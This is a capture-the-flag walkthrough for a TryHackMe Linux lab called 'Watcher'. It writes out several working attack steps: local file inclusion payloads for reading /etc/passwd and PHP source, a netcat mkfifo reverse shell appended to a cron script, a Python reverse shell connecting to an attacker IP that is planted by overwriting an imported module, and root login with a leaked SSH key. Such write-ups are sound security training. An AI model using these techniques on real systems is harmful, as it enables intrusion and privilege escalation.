https://tryhackme.com/room/watcher A boot2root Linux machine utilising web exploits along with some common privilege escalation techniques.
Watcher
7 flags in this room
wait 5 mins for all services to start up on the system
starting off with nmap nmap -p- watcher.thm -vvv
we start off running into some pretty simble LFI and can pull /post.php?post=../../../etc/passwd and find some users mat and toby.
scanning with gobuster reveals robots.txt and we can find flag 1
we can then /post.php?post=secret_file_do_not_read.txt and get the note for the ftp user ftpuser:givemefiles777
/post.php?post=php://filter/convert.base64-encode/resource=post.php
this php script is just <?php include $_GET["post"]; ?>
inside of the secret file was a note
1
2
3
4
5
Hi Mat,
The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.
Will
So if we upload a reverse shell on the php we should be able to include it, and we get a www-data shell.
sudo -l we can run any command so get a toby bash, sudo -u toby bash and pickup the 4th flag in tobys home dir.
missed a flag so find / -name flag_3.txt 2>/dev/null and pick it up
Mat left us a note in tobys home dir
1
2
3
4
5
Hi Toby,
I've got the cron jobs set up now so don't worry about getting that done.
Mat
mat is running a script in tobys dir under his privilege, cronjob /home/toby/jobs/cow.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc localhost 6670 >/tmp/f" >> /home/toby/jobs/cow.sh
we can pickup flag 5 in mats home and another note
1
2
3
4
5
Hi Mat,
I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.
Will
so we can run his will_script.py as sudo, which lso means the whitelist of commands. So since cat is allowed possibly be able to read some interesting information
1
2
3
4
5
6
7
8
9
10
11
12
13
import os
import sys
from cmd import get_command
cmd = get_command(sys.argv[1])
whitelist = ["ls -lah", "id", "cat /etc/passwd"]
if cmd not in whitelist:
print("Invalid command!")
exit()
os.system(cmd)
this is importing cmd.py so we can overwrite it with a python shell and execute.
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.2.3.64',6676));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py
sudo -u will python3 /home/mat/scripts/will_script.py cmd.py
the hint for the last key is ssh but trying to use find doesnt seem to work and scaning through linpeas i cant find much. in /opt/backups we find a b64 keyfile. we can python3 webserver this over to out attacking machine decode and login as root via ssh for the last flag. b64 -d key > root_rsa && chmod 600 root_rsa ssh root@watcher.thm -i root_rsa and we win.